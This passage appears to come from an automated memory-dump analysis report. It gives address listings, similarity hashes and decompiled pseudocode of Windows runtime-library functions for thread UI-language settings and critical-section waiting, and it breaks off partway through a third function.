0x0387268f
0x03872691
0x03872696
0x03872698
0x0387269d
0x0387269f
0x00000000
0x0387269f
0x03872681
0x00000000
0x00000000
0x03872846
0x00000000
0x00000000
0x03872605
0x0387260a
0x0387260c
0x03872611
0x03872616
0x03872619
0x03872619
0x0387261e
0x00000000
0x03872624
0x03872627
0x03872627
0x00000000
0x00000000
0x038b5b1f
0x00000000
0x00000000
0x03872894
0x0387289b
0x0387289d
0x038728a1
0x038b5b2b
0x038b5b2e
0x038b5b2e
0x038728a7
0x038728a9
0x038b5b04
0x038b5b09
0x038b5b09
0x038b5b09
0x00000000
0x00000000
0x038b5b35
0x038b5b3c
0x038728fb
0x038728fb
0x038726cc
0x038726cc
0x038726d0
0x00000000
0x038726d2
0x038726d2
0x00000000
0x038726d2
0x00000000
0x00000000
0x038725fe
0x0387292d
0x03872930
0x03872935
0x03872937
0x03872939
0x03872942
0x03872946
0x0387294e
0x03872951
0x03872951
0x03872952
0x03872958
0x0387295a
0x03872962
0x03872963
0x03872963
0x03872965
0x03872966
0x0387296c
0x0387296f
0x03872971
0x03872974
0x0387297d
0x0387297e
0x0387297f
0x03872980
0x03872981
0x03872982
0x03872983
0x03872984
0x03872985
0x03872986
0x03872987
0x03872988
0x03872989
0x0387298a
0x0387298b
0x0387298c
0x0387298d
0x0387298e
0x0387298f
0x03872990
0x03872992
0x03872997
0x038729a3
0x038729a6
0x038729ab
0x038729ad
0x038729b0
0x038729b2
0x038b5c80
0x038729b8
0x038729b8
0x038729bb
0x038729c0
0x038729c5
0x038729c6
0x038729c6
0x038729c9
0x038729cb
0x00000000
0x00000000
0x038729cd
0x038729d0
0x038729d9
0x038729db
0x038729dd
0x03872a7f
0x03872a84
0x03872a87
0x03872a89
0x038b5ca1
0x038b5ca3
0x00000000
0x03872a8f
0x03872a8f
0x00000000
0x03872a8f
0x00000000
0x038729e3
0x038729e3
0x038729e3
0x00000000
0x038729e3
0x038729dd
0x00000000
0x038729db
0x038729e6
0x038729e9
0x038729eb
0x038729ed
0x038729f3
0x038729f5
0x038729f8
0x038729fa
0x03872a97
0x03872a9a
0x03872a9d
0x03872add
0x00000000
0x03872a9f
0x03872aa2
0x03872aa5
0x03872aa8
0x03872aab
0x038b5cab
0x038b5caf
0x038b5cc5
0x038b5cda
0x038b5cdc
0x038b5cdf
0x038b5ce5
0x00000000
0x038b5ceb
0x038b5ced
0x038b5cee
0x00000000
0x038b5cee
0x038b5cb1
0x038b5cb4
0x038b5cb9
0x038b5cbb
0x00000000
0x038b5cbd
0x038b5cbd
0x00000000
0x038b5cbd
0x038b5cbb
0x03872ab1
0x03872ab1
0x03872ac4
0x03872ac6
0x03872ac6
0x00000000
0x03872ac6
0x03872aab
0x00000000
0x03872a00
0x03872a09
0x03872a0e
0x03872a21
0x03872a24
0x03872a35
0x03872a3a
0x03872a3d
0x03872a42
0x03872a59
0x03872a59
0x03872a5c
0x03872a5f
0x03872a5f
0x038729fa
0x038729f3
0x03872a64
0x03872a64
0x03872a6b
0x03872a6b
0x03872a6d
0x03872a72
0x03872a72
0x00000000

Strings

PATH, xrefs: 03872642, 03872691

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 77fb2ba24fd4772c749a4ba26e2b315c9cbe9e0af48c0230b66fca6170d2f312
Instruction ID: 3bfb7bf364d4f8af8cdb93129df8c1b3d831da8f290b6eacbbe561911998ed7a
Opcode Fuzzy Hash: 77fb2ba24fd4772c749a4ba26e2b315c9cbe9e0af48c0230b66fca6170d2f312
Instruction Fuzzy Hash: 10C19DB5E002199BCB24DFD8D981BEEB7B6FF49744F0844A9E801EB250D734E941CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0387FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0387FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0385EEF0(0x3937b60);
					_t134 =  *0x3937b84; // 0x771c7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x3937b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x3937b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E03856D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E038576E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E038E8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0384B150();
													}
													_t116 = E038E6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E038575CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x3938638; // 0x0
																	_t122 = L038538A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E038576E2(_t154);
																			goto L41;
																		}
																	} else {
																		E038576E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0387FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L038570F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0387FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0387FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0387FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0387FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0387FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x3937b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x3937b84 = _t75;
						_t73 = E0385EB70(_t134, 0x3937b60);
						if( *0x3937b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0385FF60( *0x3937b20);
							}
						}
						goto L5;
					}
				}
			}

0x0387fab0
0x0387fab2
0x0387fab3
0x0387fab4
0x0387fabc
0x0387fac0
0x0387fb14
0x0387fb17
0x0387fac2
0x0387fac8
0x0387facd
0x0387fad3
0x0387fad3
0x0387fadd
0x0387fb18
0x0387fb1b
0x0387fb1d
0x0387fb1e
0x0387fb1f
0x0387fb20
0x0387fb21
0x0387fb22
0x0387fb23
0x0387fb24
0x0387fb25
0x0387fb26
0x0387fb27
0x0387fb28
0x0387fb29
0x0387fb2a
0x0387fb2b
0x0387fb2c
0x0387fb2d
0x0387fb2e
0x0387fb2f
0x0387fb3a
0x0387fb3b
0x0387fb3e
0x0387fb41
0x0387fb44
0x0387fb47
0x0387fb4a
0x0387fb4d
0x0387fb53
0x038bbdcb
0x038bbdcb
0x0387fb59
0x0387fb5b
0x0387fb5b
0x0387fb5e
0x038bbdd5
0x038bbdd8
0x00000000
0x038bbdda
0x00000000
0x038bbdda
0x0387fb64
0x0387fb64
0x0387fb64
0x0387fb67
0x0387fb6e
0x0387fb70
0x0387fb72
0x00000000
0x0387fb78
0x0387fb7a
0x0387fb7a
0x0387fb7d
0x0387fb80
0x038bbddf
0x038bbde1
0x00000000
0x038bbde3
0x00000000
0x038bbde3
0x0387fb86
0x0387fb86
0x0387fb86
0x0387fb8b
0x0387fb90
0x0387fb92
0x0387fb94
0x0387fb9a
0x0387fb9b
0x0387fba1
0x038bbde8
0x038bbdeb
0x038bbded
0x038bbeb5
0x038bbeb5
0x038bbebb
0x038bbebd
0x038bbec3
0x038bbed2
0x038bbedd
0x038bbedd
0x038bbeed
0x00000000
0x038bbdf3
0x038bbdfe
0x038bbe06
0x038bbe0b
0x038bbe0d
0x038bbe0f
0x038bbe14
0x038bbe19
0x038bbe20
0x038bbe25
0x038bbe27
0x038bbe35
0x038bbe39
0x038bbe46
0x038bbe4f
0x038bbe54
0x038bbe56
0x038bbef8
0x038bbef8
0x00000000
0x038bbe5c
0x038bbe5c
0x038bbe60
0x00000000
0x038bbe66
0x038bbe66
0x038bbe7f
0x038bbe84
0x038bbe87
0x038bbe89
0x038bbe8b
0x038bbe99
0x038bbe9d
0x038bbea0
0x038bbeac
0x038bbeaf
0x038bbeb1
0x038bbeb3
0x038bbeb3
0x00000000
0x038bbea2
0x038bbea2
0x00000000
0x038bbea2
0x038bbe8d
0x038bbe8d
0x038bbe92
0x00000000
0x038bbe92
0x038bbe8b
0x038bbe60
0x038bbe3b
0x038bbe3b
0x038bbe3e
0x00000000
0x038bbe40
0x038bbe40
0x038bbe44
0x00000000
0x00000000
0x00000000
0x00000000
0x038bbe44
0x038bbe3e
0x038bbe29
0x038bbe29
0x00000000
0x038bbe29
0x038bbe27
0x00000000
0x0387fba7
0x0387fba7
0x0387fbab
0x038bbf02
0x0387fbb1
0x0387fbb1
0x0387fbb8
0x0387fbbd
0x0387fbbd
0x0387fbbf
0x0387fbbf
0x0387fbc5
0x0387fbcb
0x0387fbf8
0x0387fbf8
0x0387fbfa
0x00000000
0x0387fc00
0x0387fc00
0x0387fc03
0x00000000
0x0387fc09
0x0387fc09
0x0387fc0f
0x0387fc15
0x0387fc23
0x0387fc23
0x0387fc25
0x0387fc27
0x0387fc75
0x0387fc7c
0x0387fc84
0x00000000
0x0387fc29
0x0387fc29
0x0387fc2d
0x0387fc30
0x038bbf0f
0x00000000
0x0387fc36
0x0387fc38
0x0387fc3b
0x0387fc41
0x038bbf17
0x038bbf19
0x038bbf48
0x038bbf4b
0x00000000
0x038bbf1b
0x038bbf22
0x038bbf24
0x038bbf26
0x00000000
0x038bbf2c
0x038bbf37
0x038bbf39
0x038bbf3b
0x00000000
0x038bbf41
0x038bbf41
0x038bbf41
0x038bbf41
0x038bbf45
0x00000000
0x038bbf45
0x038bbf3b
0x038bbf26
0x00000000
0x0387fc47
0x0387fc47
0x0387fc49
0x0387fcb2
0x0387fcb4
0x0387fcb6
0x0387fcdc
0x0387fcdc
0x00000000
0x0387fcb8
0x0387fcc3
0x0387fcc5
0x0387fcc7
0x00000000
0x0387fcc9
0x0387fcc9
0x0387fccd
0x00000000
0x0387fccd
0x0387fcc7
0x00000000
0x0387fc4b
0x0387fc4b
0x0387fc4e
0x0387fc4e
0x0387fc51
0x0387fc51
0x0387fc54
0x0387fc5a
0x0387fc5c
0x0387fc5f
0x0387fc61
0x0387fc63
0x0387fc65
0x0387fc67
0x0387fc6e
0x0387fc72
0x0387fc72
0x0387fc72
0x0387fc72
0x0387fc67
0x0387fc61
0x00000000
0x0387fc5a
0x0387fc49
0x0387fc41
0x0387fc30
0x0387fc27
0x0387fc03
0x0387fbcd
0x0387fbd3
0x0387fbd9
0x0387fbdc
0x0387fbde
0x0387fc99
0x0387fc9b
0x0387fc9d
0x0387fcd5
0x0387fcd5
0x0387fc89
0x0387fc89
0x00000000
0x0387fc9f
0x0387fc9f
0x0387fca3
0x00000000
0x0387fca3
0x00000000
0x0387fbe4
0x0387fbe4
0x0387fbe4
0x0387fbe4
0x0387fbe9
0x0387fbf2
0x00000000
0x0387fbf2
0x0387fbde
0x0387fbcb
0x0387fbab
0x0387fc8b
0x0387fc8b
0x0387fc8c
0x0387fb80
0x0387fb72
0x0387fb5e
0x0387fc8d
0x0387fc91
0x0387fadf
0x0387fadf
0x0387fae1
0x0387fae4
0x0387fae7
0x0387faec
0x0387faf8
0x0387fb00
0x0387fb07
0x0387fb0f
0x0387fb0f
0x0387fb07
0x00000000
0x0387faf8
0x0387fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 038BBE0F

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 9eb691baaedcfbd6ae64aa881bdc6b87d4f4389ec85a80e3a85538144af0e7ad
Instruction ID: 87d614f66ad93b4ee7cb8c90d115117e02ca0e50c65506bde8de32a6132167da
Opcode Fuzzy Hash: 9eb691baaedcfbd6ae64aa881bdc6b87d4f4389ec85a80e3a85538144af0e7ad
Instruction Fuzzy Hash: 81A12675B007568BDB25DFEAC450BBAB3B6AF84714F0845E9EA02DB790DB34D841CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03842D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E03842D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x3935350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x3937bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E038897C0();
				}
				if( *0x39379c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x39379c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E03871624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E03867D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E038DFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E03889520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0387E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0389DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x3936901;
								_push(_t109);
								_v52 = _t98;
								if( *0x3936901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E03889980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E038895D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E03867D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E03867D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E038C7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E038DFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x3935350;
							if(_t109 != 0x3935350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E038DFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E038D5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x03842d8a
0x03842d8a
0x03842d92
0x03842d96
0x03842d9e
0x03842da0
0x03842da3
0x03842da5
0x03842da8
0x03842dab
0x03842db2
0x0389f9aa
0x0389f9ab
0x0389f9ae
0x0389f9ae
0x03842db8
0x03842dc2
0x0389f9b9
0x0389f9be
0x0389f9bf
0x0389f9bf
0x03842dcf
0x0389f9c9
0x03842dd5
0x03842dd5
0x03842dd5
0x03842dde
0x03842de1
0x03842e70
0x03842e72
0x03842e72
0x03842de7
0x03842deb
0x03842e7c
0x03842e83
0x03842e85
0x03842e8b
0x03842e8d
0x03842e92
0x03842e92
0x03842e85
0x03842df1
0x03842df7
0x03842df9
0x03842df9
0x03842dfc
0x03842dff
0x03842e02
0x00000000
0x03842e05
0x03842e0c
0x0389f9d9
0x03842e12
0x03842e12
0x03842e12
0x03842e1a
0x0389f9e3
0x0389f9e9
0x0389f9f0
0x0389f9f6
0x0389f9f8
0x0389f9f8
0x0389f9f0
0x03842e23
0x0389fa02
0x0389fa03
0x0389fa05
0x0389fa06
0x00000000
0x03842e29
0x03842e29
0x03842e2e
0x03842e34
0x03842e3e
0x00000000
0x00000000
0x03842e44
0x03842e47
0x03842e4d
0x00000000
0x00000000
0x03842e4f
0x03842e54
0x00000000
0x00000000
0x03842e5a
0x03842e5f
0x03842e9a
0x03842ea4
0x03842ea5
0x03842ea8
0x03842eaf
0x03842eb2
0x03842eb5
0x0389fae9
0x0389faeb
0x0389faed
0x0389faef
0x0389faf7
0x0389faf8
0x0389fafd
0x0389faff
0x0389fb04
0x0389fb04
0x0389faff
0x03842ec0
0x03842ec4
0x03842ec6
0x03842ec8
0x0389fb14
0x0389fb18
0x0389fb1e
0x0389fb21
0x0389fb21
0x03842ece
0x03842ece
0x03842ece
0x03842ed7
0x03842e61
0x03842e63
0x0389fa6b
0x0389fa71
0x0389fa76
0x0389fa78
0x0389fa8a
0x0389fa7a
0x0389fa83
0x0389fa83
0x0389fa8f
0x0389fa91
0x0389fa97
0x0389fa9d
0x0389faa4
0x0389faaa
0x0389faaf
0x0389fab1
0x0389fac3
0x0389fab3
0x0389fabc
0x0389fabc
0x0389fac8
0x0389facb
0x0389fadf
0x0389fadf
0x0389facb
0x0389faa4
0x0389fa91
0x03842e6f
0x03842e6f
0x03842e5f
0x0389fa13
0x0389fa15
0x0389fa17
0x0389fa1f
0x0389fa21
0x0389fa22
0x0389fa25
0x0389fa28
0x0389fa2f
0x0389fa2f
0x0389fa2a
0x0389fa2a
0x0389fa2a
0x0389fa31
0x0389fa34
0x0389fa36
0x0389fa3c
0x0389fa3e
0x0389fa41
0x0389fa43
0x0389fa45
0x0389fa45
0x0389fa41
0x0389fa3c
0x0389fa4a
0x0389fa4f
0x0389fa51
0x0389fa53
0x0389fa56
0x0389fa5b
0x0389fa5e
0x00000000
0x0389fa5e
0x03842e23

Strings

RTL: Re-Waiting, xrefs: 0389FA4A

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 400a0526766e641ebe5e4e99068bd9be2ffc263841986c1384adc6e22e3feee0
Instruction ID: de23bbec8bf27730f1e3af465d65369afa9a4f786fc09aa234d98fa110df4fad
Opcode Fuzzy Hash: 400a0526766e641ebe5e4e99068bd9be2ffc263841986c1384adc6e22e3feee0
Instruction Fuzzy Hash: 72610671A046489FEF25DBE8C840B7EB7E5EB45718F2C0AD6E611DB6C1C7749900C791

Uniqueness

Uniqueness Score: -1.00%

Function 03910EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E03910EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0390FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E03911074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
